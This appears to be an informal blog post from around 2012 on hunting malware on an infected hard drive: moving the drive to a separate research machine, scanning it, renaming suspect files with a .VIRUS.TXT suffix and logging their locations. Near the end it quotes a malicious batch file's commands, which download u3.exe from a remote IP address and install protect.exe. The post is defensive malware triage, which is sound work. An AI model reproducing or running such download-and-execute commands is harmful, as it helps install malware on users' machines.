A few tips and steps for finding the viruses on your computer and for setting up a research computer to collect them.
I'll be updating this for 2012 and rewording articles to cut down on that crossover search term "Research", which in many circles means "Hack" but in this case it's "Research".
This works in reverse as well if you are looking to remove a hard-to-remove virus from an active system. I use many of these processes to disable and identify the delivery package, which is for me the most important part. Once you learn how the virus was delivered you can work on preventing that type of delivery.
Posting a few tips on how to identify and find common viruses on your computer. Be careful: your anti-virus program may not have removed everything or made things safe.
You can use any of your favorite AV programs to find viruses on your computer, as long as you have access to the log reports and can actually get at the infected files.
I find the best method after you have detected or downloaded a virus is to remove the drive from the infected computer.
If you use the dual boot, dual hard drive method you can skip this part.
Once you remove the hard drive from the computer that was infected take a moment and review a few things.
1. Remove the power cord and disconnect the monitor cable from your computer.
2. Remove the memory.
3. Remove the BIOS backup battery.
Let all that be while you work on extracting your viruses from the hard drive you just removed.
Now, install the hard drive in an external enclosure and connect it to your Virology 101 computer. (Not your work computer, please.)
Now start scanning the attached drive for the virus.
When one pops up, browse to the file in Explorer and start renaming the files.
If you find:
Rename that file to:
Always label the files you suspect with the same extension and naming pattern, so if you make a mistake or rename over good files you can find them all quickly with a search. (For example, rename MSHTA.EXE to MSHTA.EXE.VIRUS.TXT if you have a trashed GUI handle issue.)
Next, start a text log of where the AV program finds the infected files.
Your AV program will most likely not find the files that delivered your virus, so this is where you need to start looking yourself.
Working Left to Right, Top to Bottom.
Start browsing your file folders.
C:\ or in our case G:\
If you see additional files that don't look like your classical files you should start making a note of things.
¹É³ÇÍø_¹ÉÊÐÐÐÇé_ÈçºÎ³´¹É (Not so Normal)
aahic.exe (Not Normal)
psiefutv.exe (Not Normal)
You get the point.
When you see something out of whack, label it with your .VIRUS.TXT labeling.
Once you have finished with all your files, you can start opening them to see if they contain information you need to clean out other areas of your computer.
Or you might find the paths to where it was installed.
The last example here is the t.bat file that was part of a program download that installed 18 nasty applications.
C:\WINDOWS\TEMP\par.exe http://220.196.x.x/ u3.exe C:\WINDOWS\TEMP\protect.exe
C:\WINDOWS\TEMP\protect.exe -install 02993
(Yes, the IP is from China and that u3.exe file is more headaches. Never click on IP address links!!! )
So now we know to look for par.exe, rename it par.exe.virus.txt, and continue our discovery process.
Expect it to take hours, but once you've done one, the next one should be faster.